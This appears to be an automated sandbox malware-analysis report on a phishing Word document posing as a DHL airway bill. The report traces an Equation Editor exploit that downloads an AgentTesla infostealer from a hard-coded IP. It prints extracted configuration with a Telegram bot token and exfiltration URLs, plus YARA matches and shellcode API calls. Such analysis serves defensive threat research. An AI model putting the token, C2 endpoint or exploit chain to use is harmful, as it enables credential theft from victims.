Edit tour

Windows Analysis Report
DHL_AWB.docx

Overview

General Information

Sample Name:	DHL_AWB.docx
Analysis ID:	679368
MD5:	aaea73067b34013e5c1c9715dcf715a4
SHA1:	a1cf21c352a13b91a2b0ab22c4367e07151c4292
SHA256:	c7351eddf1e255e0b5d5d6c7dbd054427f5fef62b7cd9d25b67166e57df21d9b
Tags:	doc
Infos:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Yara detected Telegram RAT

Yara detected AgentTesla

Yara detected AntiVM3

Sigma detected: File Dropped By EQNEDT32EXE

Antivirus detection for dropped file

Multi AV Scanner detection for dropped file

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Shellcode detected

Yara detected Generic Downloader

Office equation editor drops PE file

Contains an external reference to another file

Machine Learning detection for dropped file

Office equation editor establishes network connection

Drops PE files to the user root directory

Queries the volume information (name, serial number etc) of a device

Yara signature match

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Downloads executable code via HTTP

Document misses a certain OLE stream usually present in this Microsoft Office document type

Contains long sleeps (>= 3 min)

Enables debug privileges

Potential document exploit detected (unknown TCP traffic)

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Contains functionality to download and execute PE files

Office Equation Editor has been started

Contains functionality to download and launch executables

Binary contains a suspicious time stamp

Drops PE files to the user directory

Dropped file seen in connection with other malware

Potential document exploit detected (performs HTTP gets)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w7x64

WINWORD.EXE (PID: 2924 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)

EQNEDT32.EXE (PID: 2440 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

vbc.exe (PID: 2192 cmdline: "C:\Users\Public\vbc.exe" MD5: DD7507C4B13050E9A433A7BD70F7591F)

vbc.exe (PID: 1708 cmdline: C:\Users\Public\vbc.exe MD5: DD7507C4B13050E9A433A7BD70F7591F)

vbc.exe (PID: 2644 cmdline: C:\Users\Public\vbc.exe MD5: DD7507C4B13050E9A433A7BD70F7591F)

vbc.exe (PID: 980 cmdline: C:\Users\Public\vbc.exe MD5: DD7507C4B13050E9A433A7BD70F7591F)

vbc.exe (PID: 512 cmdline: C:\Users\Public\vbc.exe MD5: DD7507C4B13050E9A433A7BD70F7591F)

vbc.exe (PID: 2384 cmdline: C:\Users\Public\vbc.exe MD5: DD7507C4B13050E9A433A7BD70F7591F)

EXCEL.EXE (PID: 2456 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

EXCEL.EXE (PID: 2868 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

cleanup

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Chat id": "1952161154", "Chat URL": "https://api.telegram.org/bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/sendDocument"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\doc_200[1].doc	INDICATOR_RTF_MalVer_Objects	Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.	ditekSHen	0x1b47:$obj2: \objdata 0x1b68:$obj2: \objdata 0x1fb5:$obj3: \objupdate
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\694BA9C1.doc	INDICATOR_RTF_MalVer_Objects	Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.	ditekSHen	0x1b47:$obj2: \objdata 0x1b68:$obj2: \objdata 0x1fb5:$obj3: \objupdate

Memory Dumps

Source	Rule	Description	Author	Strings
0000000A.00000002.967107263.0000000002446000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0000000A.00000002.966356766.00000000021F1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0000000A.00000002.967422759.00000000032AE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000A.00000002.967422759.00000000032AE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0000000A.00000002.967422759.00000000032AE000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x69cb7:$a3: MailAccountConfiguration 0x9fed7:$a3: MailAccountConfiguration 0x69cd0:$a5: SmtpAccountConfiguration 0x9fef0:$a5: SmtpAccountConfiguration 0x69c97:$a8: set_BindingAccountConfiguration 0x9feb7:$a8: set_BindingAccountConfiguration 0x68bea:$a11: get_securityProfile 0x9ee0a:$a11: get_securityProfile 0x68a8b:$a12: get_useSeparateFolderTree 0x9ecab:$a12: get_useSeparateFolderTree 0x6a3fa:$a13: get_DnsResolver 0xa061a:$a13: get_DnsResolver 0x68e9a:$a14: get_archivingScope 0x9f0ba:$a14: get_archivingScope 0x68cc2:$a15: get_providerName 0x9eee2:$a15: get_providerName 0x6b3e5:$a17: get_priority 0xa1605:$a17: get_priority 0x6a9b9:$a18: get_advancedParameters 0xa0bd9:$a18: get_advancedParameters 0x69dd1:$a19: get_disabledByRestriction
Process Memory Space: vbc.exe PID: 2192	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: vbc.exe PID: 2192	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: vbc.exe PID: 2192	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: vbc.exe PID: 2192	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x144cf2:$a3: MailAccountConfiguration 0x144d0b:$a5: SmtpAccountConfiguration 0x144cd2:$a8: set_BindingAccountConfiguration 0x143db0:$a11: get_securityProfile 0x143c54:$a12: get_useSeparateFolderTree 0x145390:$a13: get_DnsResolver 0x14405c:$a14: get_archivingScope 0x143e88:$a15: get_providerName 0x14625c:$a17: get_priority 0x14591f:$a18: get_advancedParameters 0x144e0c:$a19: get_disabledByRestriction 0x143a5c:$a20: get_LastAccessed 0x1440f6:$a21: get_avatarType 0x145a36:$a22: get_signaturePresets 0x1446dd:$a23: get_enableLog 0x143f05:$a26: set_accountName 0x145e60:$a27: set_InternalServerPort 0x143849:$a28: set_bindingConfigurationUID 0x1459fc:$a29: set_IdnAddress 0x14611a:$a30: set_GuidMasterKey 0x143f60:$a31: set_username
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
10.2.vbc.exe.331cbe8.10.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
10.2.vbc.exe.331cbe8.10.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
10.2.vbc.exe.331cbe8.10.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x2efaa:$s1: get_kbok 0x2f8de:$s2: get_CHoo 0x30539:$s3: set_passwordIsSet 0x2edae:$s4: get_enableLog 0x33501:$s8: torbrowser 0x31edd:$s10: logins 0x317ab:$s11: credential 0x2e187:$g1: get_Clipboard 0x2e195:$g2: get_Keyboard 0x2e1a2:$g3: get_Password 0x2f78c:$g4: get_CtrlKeyDown 0x2f79c:$g5: get_ShiftKeyDown 0x2f7ad:$g6: get_AltKeyDown
10.2.vbc.exe.331cbe8.10.unpack	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x2f4ef:$a3: MailAccountConfiguration 0x2f508:$a5: SmtpAccountConfiguration 0x2f4cf:$a8: set_BindingAccountConfiguration 0x2e422:$a11: get_securityProfile 0x2e2c3:$a12: get_useSeparateFolderTree 0x2fc32:$a13: get_DnsResolver 0x2e6d2:$a14: get_archivingScope 0x2e4fa:$a15: get_providerName 0x30c1d:$a17: get_priority 0x301f1:$a18: get_advancedParameters 0x2f609:$a19: get_disabledByRestriction 0x2e099:$a20: get_LastAccessed 0x2e76c:$a21: get_avatarType 0x30308:$a22: get_signaturePresets 0x2edae:$a23: get_enableLog 0x2e577:$a26: set_accountName 0x30753:$a27: set_InternalServerPort 0x2da21:$a28: set_bindingConfigurationUID 0x302ce:$a29: set_IdnAddress 0x30ad1:$a30: set_GuidMasterKey 0x2e5d2:$a31: set_username
10.2.vbc.exe.32e69c8.9.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
10.2.vbc.exe.32e69c8.9.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
10.2.vbc.exe.32e69c8.9.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x2efaa:$s1: get_kbok 0x2f8de:$s2: get_CHoo 0x30539:$s3: set_passwordIsSet 0x2edae:$s4: get_enableLog 0x33501:$s8: torbrowser 0x31edd:$s10: logins 0x317ab:$s11: credential 0x2e187:$g1: get_Clipboard 0x2e195:$g2: get_Keyboard 0x2e1a2:$g3: get_Password 0x2f78c:$g4: get_CtrlKeyDown 0x2f79c:$g5: get_ShiftKeyDown 0x2f7ad:$g6: get_AltKeyDown
10.2.vbc.exe.32e69c8.9.unpack	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x2f4ef:$a3: MailAccountConfiguration 0x2f508:$a5: SmtpAccountConfiguration 0x2f4cf:$a8: set_BindingAccountConfiguration 0x2e422:$a11: get_securityProfile 0x2e2c3:$a12: get_useSeparateFolderTree 0x2fc32:$a13: get_DnsResolver 0x2e6d2:$a14: get_archivingScope 0x2e4fa:$a15: get_providerName 0x30c1d:$a17: get_priority 0x301f1:$a18: get_advancedParameters 0x2f609:$a19: get_disabledByRestriction 0x2e099:$a20: get_LastAccessed 0x2e76c:$a21: get_avatarType 0x30308:$a22: get_signaturePresets 0x2edae:$a23: get_enableLog 0x2e577:$a26: set_accountName 0x30753:$a27: set_InternalServerPort 0x2da21:$a28: set_bindingConfigurationUID 0x302ce:$a29: set_IdnAddress 0x30ad1:$a30: set_GuidMasterKey 0x2e5d2:$a31: set_username
10.2.vbc.exe.331cbe8.10.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
10.2.vbc.exe.331cbe8.10.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
10.2.vbc.exe.331cbe8.10.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
10.2.vbc.exe.331cbe8.10.raw.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x30daa:$s1: get_kbok 0x316de:$s2: get_CHoo 0x32339:$s3: set_passwordIsSet 0x30bae:$s4: get_enableLog 0x35301:$s8: torbrowser 0x33cdd:$s10: logins 0x335ab:$s11: credential 0x2ff87:$g1: get_Clipboard 0x2ff95:$g2: get_Keyboard 0x2ffa2:$g3: get_Password 0x3158c:$g4: get_CtrlKeyDown 0x3159c:$g5: get_ShiftKeyDown 0x315ad:$g6: get_AltKeyDown
10.2.vbc.exe.331cbe8.10.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0xb4ce1:$s1: file:/// 0x122501:$s1: file:/// 0xb4bcd:$s2: {11111-22222-10009-11112} 0x1223ed:$s2: {11111-22222-10009-11112} 0xb4c71:$s3: {11111-22222-50001-00000} 0x122491:$s3: {11111-22222-50001-00000} 0xb39a1:$s4: get_Module 0x1211c1:$s4: get_Module 0x3065a:$s5: Reverse 0xb3cdc:$s5: Reverse 0x1214fc:$s5: Reverse 0x32980:$s6: BlockCopy 0xaf842:$s6: BlockCopy 0x11d062:$s6: BlockCopy 0x308fb:$s7: ReadByte 0xb4cf3:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ... 0x122513:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
10.2.vbc.exe.331cbe8.10.raw.unpack	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x312ef:$a3: MailAccountConfiguration 0x31308:$a5: SmtpAccountConfiguration 0x312cf:$a8: set_BindingAccountConfiguration 0x30222:$a11: get_securityProfile 0x300c3:$a12: get_useSeparateFolderTree 0x31a32:$a13: get_DnsResolver 0x304d2:$a14: get_archivingScope 0x302fa:$a15: get_providerName 0x32a1d:$a17: get_priority 0x31ff1:$a18: get_advancedParameters 0x31409:$a19: get_disabledByRestriction 0x2fe99:$a20: get_LastAccessed 0x3056c:$a21: get_avatarType 0x32108:$a22: get_signaturePresets 0x30bae:$a23: get_enableLog 0x30377:$a26: set_accountName 0x32553:$a27: set_InternalServerPort 0x2f821:$a28: set_bindingConfigurationUID 0x320ce:$a29: set_IdnAddress 0x328d1:$a30: set_GuidMasterKey 0x303d2:$a31: set_username
10.2.vbc.exe.32ae9a8.11.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
10.2.vbc.exe.32ae9a8.11.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
10.2.vbc.exe.32ae9a8.11.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
10.2.vbc.exe.32ae9a8.11.raw.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x68dca:$s1: get_kbok 0x9efea:$s1: get_kbok 0x696fe:$s2: get_CHoo 0x9f91e:$s2: get_CHoo 0x6a359:$s3: set_passwordIsSet 0xa0579:$s3: set_passwordIsSet 0x68bce:$s4: get_enableLog 0x9edee:$s4: get_enableLog 0x6d321:$s8: torbrowser 0xa3541:$s8: torbrowser 0x6bcfd:$s10: logins 0xa1f1d:$s10: logins 0x6b5cb:$s11: credential 0xa17eb:$s11: credential 0x67fa7:$g1: get_Clipboard 0x9e1c7:$g1: get_Clipboard 0x67fb5:$g2: get_Keyboard 0x9e1d5:$g2: get_Keyboard 0x67fc2:$g3: get_Password 0x9e1e2:$g3: get_Password 0x695ac:$g4: get_CtrlKeyDown
10.2.vbc.exe.32ae9a8.11.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x122f21:$s1: file:/// 0x190741:$s1: file:/// 0x122e0d:$s2: {11111-22222-10009-11112} 0x19062d:$s2: {11111-22222-10009-11112} 0x122eb1:$s3: {11111-22222-50001-00000} 0x1906d1:$s3: {11111-22222-50001-00000} 0x121be1:$s4: get_Module 0x18f401:$s4: get_Module 0x6867a:$s5: Reverse 0x9e89a:$s5: Reverse 0x121f1c:$s5: Reverse 0x18f73c:$s5: Reverse 0x6a9a0:$s6: BlockCopy 0xa0bc0:$s6: BlockCopy 0x11da82:$s6: BlockCopy 0x18b2a2:$s6: BlockCopy 0x6891b:$s7: ReadByte 0x9eb3b:$s7: ReadByte 0x122f33:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ... 0x190753:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
10.2.vbc.exe.32ae9a8.11.raw.unpack	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x6930f:$a3: MailAccountConfiguration 0x9f52f:$a3: MailAccountConfiguration 0x69328:$a5: SmtpAccountConfiguration 0x9f548:$a5: SmtpAccountConfiguration 0x692ef:$a8: set_BindingAccountConfiguration 0x9f50f:$a8: set_BindingAccountConfiguration 0x68242:$a11: get_securityProfile 0x9e462:$a11: get_securityProfile 0x680e3:$a12: get_useSeparateFolderTree 0x9e303:$a12: get_useSeparateFolderTree 0x69a52:$a13: get_DnsResolver 0x9fc72:$a13: get_DnsResolver 0x684f2:$a14: get_archivingScope 0x9e712:$a14: get_archivingScope 0x6831a:$a15: get_providerName 0x9e53a:$a15: get_providerName 0x6aa3d:$a17: get_priority 0xa0c5d:$a17: get_priority 0x6a011:$a18: get_advancedParameters 0xa0231:$a18: get_advancedParameters 0x69429:$a19: get_disabledByRestriction
10.2.vbc.exe.32e69c8.9.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
10.2.vbc.exe.32e69c8.9.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
10.2.vbc.exe.32e69c8.9.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
10.2.vbc.exe.32e69c8.9.raw.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x30daa:$s1: get_kbok 0x66fca:$s1: get_kbok 0x316de:$s2: get_CHoo 0x678fe:$s2: get_CHoo 0x32339:$s3: set_passwordIsSet 0x68559:$s3: set_passwordIsSet 0x30bae:$s4: get_enableLog 0x66dce:$s4: get_enableLog 0x35301:$s8: torbrowser 0x6b521:$s8: torbrowser 0x33cdd:$s10: logins 0x69efd:$s10: logins 0x335ab:$s11: credential 0x697cb:$s11: credential 0x2ff87:$g1: get_Clipboard 0x661a7:$g1: get_Clipboard 0x2ff95:$g2: get_Keyboard 0x661b5:$g2: get_Keyboard 0x2ffa2:$g3: get_Password 0x661c2:$g3: get_Password 0x3158c:$g4: get_CtrlKeyDown
10.2.vbc.exe.32e69c8.9.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0xeaf01:$s1: file:/// 0x158721:$s1: file:/// 0xeaded:$s2: {11111-22222-10009-11112} 0x15860d:$s2: {11111-22222-10009-11112} 0xeae91:$s3: {11111-22222-50001-00000} 0x1586b1:$s3: {11111-22222-50001-00000} 0xe9bc1:$s4: get_Module 0x1573e1:$s4: get_Module 0x3065a:$s5: Reverse 0x6687a:$s5: Reverse 0xe9efc:$s5: Reverse 0x15771c:$s5: Reverse 0x32980:$s6: BlockCopy 0x68ba0:$s6: BlockCopy 0xe5a62:$s6: BlockCopy 0x153282:$s6: BlockCopy 0x308fb:$s7: ReadByte 0x66b1b:$s7: ReadByte 0xeaf13:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ... 0x158733:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
10.2.vbc.exe.32e69c8.9.raw.unpack	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x312ef:$a3: MailAccountConfiguration 0x6750f:$a3: MailAccountConfiguration 0x31308:$a5: SmtpAccountConfiguration 0x67528:$a5: SmtpAccountConfiguration 0x312cf:$a8: set_BindingAccountConfiguration 0x674ef:$a8: set_BindingAccountConfiguration 0x30222:$a11: get_securityProfile 0x66442:$a11: get_securityProfile 0x300c3:$a12: get_useSeparateFolderTree 0x662e3:$a12: get_useSeparateFolderTree 0x31a32:$a13: get_DnsResolver 0x67c52:$a13: get_DnsResolver 0x304d2:$a14: get_archivingScope 0x666f2:$a14: get_archivingScope 0x302fa:$a15: get_providerName 0x6651a:$a15: get_providerName 0x32a1d:$a17: get_priority 0x68c3d:$a17: get_priority 0x31ff1:$a18: get_advancedParameters 0x68211:$a18: get_advancedParameters 0x31409:$a19: get_disabledByRestriction
Click to see the 21 entries

Sigma Signatures

Exploits

Sigma detected: File Dropped By EQNEDT32EXE

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2440, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: DHL_AWB.docx	Virustotal: Detection: 22%			Perma Link
Source: DHL_AWB.docx	ReversingLabs: Detection: 28%

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe	Avira: detection malicious, Label: TR/AD.AgentTesla.qwkzk
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\694BA9C1.doc	Avira: detection malicious, Label: HEUR/Rtf.Malformed
Source: C:\Users\Public\vbc.exe	Avira: detection malicious, Label: TR/AD.AgentTesla.qwkzk
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{61C0FE69-632E-42B0-9EAB-CB8720AB2605}.tmp	Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\doc_200[1].doc	Avira: detection malicious, Label: HEUR/Rtf.Malformed

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe	Metadefender: Detection: 31%	Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe	ReversingLabs: Detection: 92%
Source: C:\Users\Public\vbc.exe	Metadefender: Detection: 31%	Perma Link
Source: C:\Users\Public\vbc.exe	ReversingLabs: Detection: 92%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe	Joe Sandbox ML: detected
Source: C:\Users\Public\vbc.exe	Joe Sandbox ML: detected

Source: 10.2.vbc.exe.331cbe8.10.unpack	Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "1952161154", "Chat URL": "https://api.telegram.org/bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/sendDocument"}
Source: vbc.exe.2192.10.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/sendMessage"}

Exploits

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office equation editor establishes network connection

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Network connect: IP: 198.23.207.54 Port: 80

Jump to behavior

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Software Vulnerabilities

Shellcode detected

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 9_2_036406E7 ShellExecuteW,ExitProcess,	9_2_036406E7
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 9_2_0364064C LoadLibraryW,	9_2_0364064C
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 9_2_036406B9 URLDownloadToFileW,ShellExecuteW,ExitProcess,	9_2_036406B9
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 9_2_03640666 URLDownloadToFileW,ShellExecuteW,ExitProcess,	9_2_03640666
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 9_2_036406D2 ShellExecuteW,ExitProcess,	9_2_036406D2
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 9_2_0364070C ExitProcess,	9_2_0364070C

Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.23.207.54:80
Source: global traffic	TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.23.207.54:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.23.207.54:80
Source: global traffic	TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.23.207.54:80
Source: global traffic	TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.23.207.54:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 198.23.207.54:80
Source: global traffic	TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 198.23.207.54:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 198.23.207.54:80
Source: global traffic	TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 198.23.207.54:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 198.23.207.54:80
Source: global traffic	TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 198.23.207.54:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 198.23.207.54:80
Source: global traffic	TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 198.23.207.54:80
Source: global traffic	TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 198.23.207.54:80
Source: global traffic	TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 198.23.207.54:80
Source: global traffic	TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 198.23.207.54:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 198.23.207.54:80
Source: global traffic	TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 198.23.207.54:80
Source: global traffic	TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 198.23.207.54:80
Source: global traffic	TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 198.23.207.54:80
Source: global traffic	TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 198.23.207.54:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 198.23.207.54:80
Source: global traffic	TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 198.23.207.54:80
Source: global traffic	TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.23.207.54:80
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 198.23.207.54:80
Source: global traffic	TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 198.23.207.54:80
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 198.23.207.54:80
Source: global traffic	TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 198.23.207.54:80
Source: global traffic	TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49174
